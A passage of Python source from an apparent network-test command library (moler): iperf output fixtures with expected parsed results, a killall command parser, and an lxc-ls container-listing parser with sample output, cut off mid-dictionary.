'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}]},
'INFO': ['Server listening on UDP port 5016', 'Receiving 1470 byte datagrams',
'UDP buffer size: 1024 KByte (default)',
'Client connecting to 192.168.0.12, UDP port 5016',
'Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)',
'UDP buffer size: 1024 KByte (default)',
'[ 4] Sent 2552 datagrams',
'[ 4] Server Report:']}
COMMAND_OUTPUT_bidirectional_udp_server = """
ute@2-7-TL166:~$ iperf -s -u -p 5016 -f k -i 1.0
------------------------------------------------------------
Server listening on UDP port 5016
Receiving 1470 byte datagrams
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
[ 3] local 192.168.0.12 port 5016 connected with 192.168.0.10 port 56262
------------------------------------------------------------
Client connecting to 192.168.0.10, UDP port 5016
Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
[ 5] local 192.168.0.12 port 47384 connected with 192.168.0.10 port 5016
[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
[ 3] 0.0- 1.0 sec 612 KBytes 5010 Kbits/sec 0.022 ms 0/ 426 (0%)
[ 5] 0.0- 1.0 sec 613 KBytes 5022 Kbits/sec
[ 3] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec 0.016 ms 0/ 425 (0%)
[ 5] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec 0.021 ms 0/ 425 (0%)
[ 5] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec 0.009 ms 0/ 425 (0%)
[ 5] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 4.0- 5.0 sec 612 KBytes 5010 Kbits/sec 0.014 ms 0/ 426 (0%)
[ 5] 4.0- 5.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 5.0- 6.0 sec 610 KBytes 4998 Kbits/sec 0.018 ms 0/ 425 (0%)
[ 3] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.018 ms 0/ 2552 (0%)
[ 5] 5.0- 6.0 sec 610 KBytes 4998 Kbits/sec
[ 5] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec
[ 5] Sent 2552 datagrams
[ 5] Server Report:
[ 5] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.017 ms 0/ 2552 (0%)
ute@2-7-TL166:~$"""
COMMAND_KWARGS_bidirectional_udp_server = {
'options': '-u -p 5016 -f k -i 1.0'
}
COMMAND_RESULT_bidirectional_udp_server = {
'CONNECTIONS': {
'local 192.168.0.12 port 47384 connected with 192.168.0.10 port 5016': [{'Transfer': 627712,
'Bandwidth': 627750,
'Transfer Raw': '613 KBytes',
'Bandwidth Raw': '5022 Kbits/sec',
'Interval': '0.0- 1.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '1.0- 2.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '2.0- 3.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '3.0- 4.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '4.0- 5.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '5.0- 6.0 sec'},
{'Transfer': 3751936,
'Bandwidth': 625000,
'Transfer Raw': '3664 KBytes',
'Bandwidth Raw': '5000 Kbits/sec',
'Interval': '0.0- 6.0 sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.017 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}],
'local 192.168.0.12 port 5016 connected with 192.168.0.10 port 56262': [{'Transfer Raw': '612 KBytes',
'Jitter': '0.022 ms',
'Transfer': 626688,
'Interval': '0.0- 1.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.016 ms',
'Transfer': 624640,
'Interval': '1.0- 2.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.021 ms',
'Transfer': 624640,
'Interval': '2.0- 3.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.009 ms',
'Transfer': 624640,
'Interval': '3.0- 4.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '612 KBytes',
'Jitter': '0.014 ms',
'Transfer': 626688,
'Interval': '4.0- 5.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.018 ms',
'Transfer': 624640,
'Interval': '5.0- 6.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.018 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}]},
'INFO': ['Server listening on UDP port 5016',
'Receiving 1470 byte datagrams',
'UDP buffer size: 1024 KByte (default)',
'Client connecting to 192.168.0.10, UDP port 5016',
'Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)',
'UDP buffer size: 1024 KByte (default)',
'[ 5] Sent 2552 datagrams',
'[ 5] Server Report:']}
COMMAND_OUTPUT_multiple_connections = """
xyz@debian:~$ iperf -c 192.168.0.100 -P 20
------------------------------------------------------------
Client connecting to 192.168.0.100, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[ 15] local 192.168.0.102 port 57258 connected with 192.168.0.100 port 5001
[ 3] local 192.168.0.102 port 57246 connected with 192.168.0.100 port 5001
[ 4] local 192.168.0.102 port 57247 connected with 192.168.0.100 port 5001
[ 5] local 192.168.0.102 port 57248 connected with 192.168.0.100 port 5001
[ 7] local 192.168.0.102 port 57250 connected with 192.168.0.100 port 5001
[ 6] local 192.168.0.102 port 57249 connected with 192.168.0.100 port 5001
[ 10] local 192.168.0.102 port 57253 connected with 192.168.0.100 port 5001
[ 8] local 192.168.0.102 port 57251 connected with 192.168.0.100 port 5001
[ 9] local 192.168.0.102 port 57252 connected with 192.168.0.100 port 5001
[ 16] local 192.168.0.102 port 57259 connected with 192.168.0.100 port 5001
[ 19] local 192.168.0.102 port 57261 connected with 192.168.0.100 port 5001
[ 18] local 192.168.0.102 port 57260 connected with 192.168.0.100 port 5001
[ 20] local 192.168.0.102 port 57262 connected with 192.168.0.100 port 5001
[ 17] local 192.168.0.102 port 57263 connected with 192.168.0.100 port 5001
[ 21] local 192.168.0.102 port 57264 connected with 192.168.0.100 port 5001
[ 11] local 192.168.0.102 port 57254 connected with 192.168.0.100 port 5001
[ 12] local 192.168.0.102 port 57255 connected with 192.168.0.100 port 5001
[ 13] local 192.168.0.102 port 57256 connected with 192.168.0.100 port 5001
[ 14] local 192.168.0.102 port 57257 connected with 192.168.0.100 port 5001
[ 22] local 192.168.0.102 port 57265 connected with 192.168.0.100 port 5001
[ ID] Interval Transfer Bandwidth
[ 8] 0.0-10.6 sec 16.6 MBytes 13.1 Mbits/sec
[ 16] 0.0-10.6 sec 16.6 MBytes 13.1 Mbits/sec
[ 18] 0.0-10.6 sec 16.5 MBytes 13.1 Mbits/sec
[ 17] 0.0-10.7 sec 16.6 MBytes 13.0 Mbits/sec
[ 21] 0.0-10.7 sec 15.6 MBytes 12.3 Mbits/sec
[ 12] 0.0-10.7 sec 17.5 MBytes 13.7 Mbits/sec
[ 22] 0.0-10.7 sec 16.6 MBytes 13.0 Mbits/sec
[ 15] 0.0-10.8 sec 17.8 MBytes 13.8 Mbits/sec
[ 3] 0.0-10.7 sec 18.5 MBytes 14.5 Mbits/sec
[ 4] 0.0-10.8 sec 18.1 MBytes 14.1 Mbits/sec
[ 5] 0.0-10.7 sec 17.6 MBytes 13.9 Mbits/sec
[ 7] 0.0-10.8 sec 18.4 MBytes 14.3 Mbits/sec
[ 6] 0.0-10.8 sec 17.0 MBytes 13.2 Mbits/sec
[ 10] 0.0-10.8 sec 16.8 MBytes 13.1 Mbits/sec
[ 9] 0.0-10.8 sec 16.8 MBytes 13.0 Mbits/sec
[ 19] 0.0-10.6 sec 16.5 MBytes 13.0 Mbits/sec
[ 20] 0.0-10.7 sec 16.5 MBytes 12.9 Mbits/sec
[ 11] 0.0-10.7 sec 18.0 MBytes 14.0 Mbits/sec
[ 13] 0.0-10.7 sec 17.8 MBytes 13.9 Mbits/sec
[ 14] 0.0-10.8 sec 18.2 MBytes 14.1 Mbits/sec
[SUM] 0.0-10.8 sec 344 MBytes 266 Mbits/sec
xyz@debian:~$"""
COMMAND_KWARGS_multiple_connections = {
'options': '-c 192.168.0.100 -P 20'
}
COMMAND_RESULT_multiple_connections = {
'CONNECTIONS': {
'local 192.168.0.102 port 57246 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.5 Mbits/sec',
'Bandwidth': 1812500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '18.5 MBytes',
'Transfer': 19398656}],
'local 192.168.0.102 port 57247 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.1 Mbits/sec',
'Bandwidth': 1762500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '18.1 MBytes',
'Transfer': 18979225}],
'local 192.168.0.102 port 57248 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.9 Mbits/sec',
'Bandwidth': 1737500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '17.6 MBytes',
'Transfer': 18454937}],
'local 192.168.0.102 port 57249 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.2 Mbits/sec',
'Bandwidth': 1650000,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '17.0 MBytes',
'Transfer': 17825792}],
'local 192.168.0.102 port 57250 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.3 Mbits/sec',
'Bandwidth': 1787500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '18.4 MBytes',
'Transfer': 19293798}],
'local 192.168.0.102 port 57251 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}],
'local 192.168.0.102 port 57252 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '16.8 MBytes',
'Transfer': 17616076}],
'local 192.168.0.102 port 57253 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '16.8 MBytes',
'Transfer': 17616076}],
'local 192.168.0.102 port 57254 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.0 Mbits/sec',
'Bandwidth': 1750000,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '18.0 MBytes',
'Transfer': 18874368}],
'local 192.168.0.102 port 57255 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.7 Mbits/sec',
'Bandwidth': 1712500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '17.5 MBytes',
'Transfer': 18350080}],
'local 192.168.0.102 port 57256 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.9 Mbits/sec',
'Bandwidth': 1737500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '17.8 MBytes',
'Transfer': 18664652}],
'local 192.168.0.102 port 57257 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.1 Mbits/sec',
'Bandwidth': 1762500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '18.2 MBytes',
'Transfer': 19084083}],
'local 192.168.0.102 port 57258 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.8 Mbits/sec',
'Bandwidth': 1725000,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '17.8 MBytes',
'Transfer': 18664652}],
'local 192.168.0.102 port 57259 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}],
'local 192.168.0.102 port 57260 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.5 MBytes',
'Transfer': 17301504}],
'local 192.168.0.102 port 57261 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.5 MBytes',
'Transfer': 17301504}],
'local 192.168.0.102 port 57262 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '12.9 Mbits/sec',
'Bandwidth': 1612500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '16.5 MBytes',
'Transfer': 17301504}],
'local 192.168.0.102 port 57263 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}],
'local 192.168.0.102 port 57264 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '12.3 Mbits/sec',
'Bandwidth': 1537500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '15.6 MBytes',
'Transfer': 16357785}],
'local 192.168.0.102 port 57265 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}]},
'INFO': ['Client connecting to 192.168.0.100, TCP port 5001', 'TCP window size: 16.0 KByte (default)',
'[SUM] 0.0-10.8 sec 344 MBytes 266 Mbits/sec']}
```
#### File: cmd/unix/killall.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
class Killall(GenericUnixCommand):
def __init__(self, connection, name, is_verbose=False, prompt=None, newline_chars=None, runner=None):
super(Killall, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
self.is_verbose = is_verbose
self.name = name
self.ret_required = False
def build_command_string(self):
if self.is_verbose:
cmd = "{} {} {}".format("killall", "-v", self.name)
else:
cmd = "{} {}".format("killall", self.name)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_no_permit(line)
self._parse_killall_verbose(line)
except ParsingDone:
pass
return super(Killall, self).on_new_line(line, is_full_line)
def _parse_no_permit(self, line):
if self._regex_helper.search(r'(Operation not permitted)', line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group(1))))
raise ParsingDone
_re_killall = re.compile(r"Killed (?P<Name>[^\(]+)\((?P<Pid>\d+)\) with signal")
def _parse_killall_verbose(self, line):
if self.is_verbose:
if self._regex_helper.search_compiled(Killall._re_killall, line):
if "Detail" not in self.current_ret:
self.current_ret["Detail"] = dict()
pid = self._regex_helper.group("Pid")
self.current_ret["Detail"][pid] = self._regex_helper.group("Name")
raise ParsingDone
COMMAND_OUTPUT_no_verbose = """
Pclinux90:~ # killall iperf
Pclinux90:~ # """
COMMAND_KWARGS_no_verbose = {"name": "iperf"}
COMMAND_RESULT_no_verbose = {
}
COMMAND_OUTPUT_no_process = """
PClinux110:/home/runner # killall tshark
tshark: no process found
PClinux110:/home/runner #"""
COMMAND_KWARGS_no_process = {"name": "tshark"}
COMMAND_RESULT_no_process = {
}
COMMAND_OUTPUT_verbose = """
Pclinux90:~ # killall -v iperf
Killed iperf(15054) with signal 15
Pclinux90:~ # """
COMMAND_KWARGS_verbose = {
"name": "iperf",
"is_verbose": True
}
COMMAND_RESULT_verbose = {
"Detail": {"15054": "iperf"}
}
```
#### File: cmd/unix/lxc_ls.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
class LxcLs(GenericUnixCommand):
"""Lxcls command class."""
def __init__(self, connection, prompt=None, newline_chars=None, runner=None, options=None):
"""
Lxcls command lists containers.
:param connection: moler connection to device, terminal when command is executed.
:param prompt: expected prompt sending by device after command execution
:param newline_chars: Characters to split lines
:param runner: Runner to run command
:param options: command options as string
"""
super(LxcLs, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.current_ret["RESULT"] = list()
self._headers = list()
def build_command_string(self):
"""
Build command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
cmd = "lxc-ls"
if self.options:
cmd = "{} {}".format(cmd, self.options)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
try:
self._command_error(line)
self._parse_table_headers(line)
self._parse_table_row(line)
self._parse_line(line)
except ParsingDone:
pass
return super(LxcLs, self).on_new_line(line, is_full_line)
_re_command_error = re.compile(r'(?P<ERROR>lxc-ls:\s+.+)', re.I)
def _command_error(self, line):
if self._regex_helper.search_compiled(LxcLs._re_command_error, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("ERROR"))))
_re_headers = re.compile(r"NAME\s+STATE\s+AUTOSTART\s+GROUPS\s+IPV4\s+IPV6", re.I)
def _parse_table_headers(self, line):
if self._regex_helper.search_compiled(LxcLs._re_headers, line):
self._headers = ['Name', 'State', 'Autostart', 'Groups', 'IPv4', 'IPv6']
raise ParsingDone
def _parse_table_row(self, line):
if self._headers:
values = re.split(r'([^,])\s+', line)
striped_values = list()
values_size = len(values)
i = 0
while i < values_size - 1:
striped_values.append(values[i] + values[i + 1])
i += 2
if values_size % 2 != 0:
striped_values.append(values[-1])
self.current_ret["RESULT"].append(dict(zip(self._headers, striped_values)))
raise ParsingDone
def _parse_line(self, line):
self.current_ret["RESULT"].append(line.split())
raise ParsingDone
COMMAND_OUTPUT = """root@server~ >lxc-ls
0xe000 0xe001 0xe002 0xe003 0xe004 0xe009 0xe00a 0xe00b 0xe00c 0xe00d 0xe019
root@server~ >"""
COMMAND_KWARGS = {}
COMMAND_RESULT = {
"RESULT": [['0xe000', '0xe001', '0xe002', '0xe003', '0xe004', '0xe009', '0xe00a', '0xe00b', '0xe00c', '0xe00d',
'0xe019']]
}
COMMAND_OUTPUT_2 = """
root@server~ >lxc-ls -f
NAME STATE AUTOSTART GROUPS IPV4 IPV6
0xe000 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe001 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe002 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe003 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe004 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe009 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00a RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00b RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00c RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe00d RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe019 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
root@server~ >"""
COMMAND_KWARGS_2 = {
"options": "-f"
}
COMMAND_RESULT_2 = {
"RESULT": [
{
'Name': '0xe000',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe001',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe002',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe003',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe004',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe009',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00a',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00b',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00c',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
'IPv4': '10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253',
'IPv6': '-'
},
{
'Name': '0xe00d',
'State': 'RUNNING',
'Autostart': '0',
'Groups': '-',
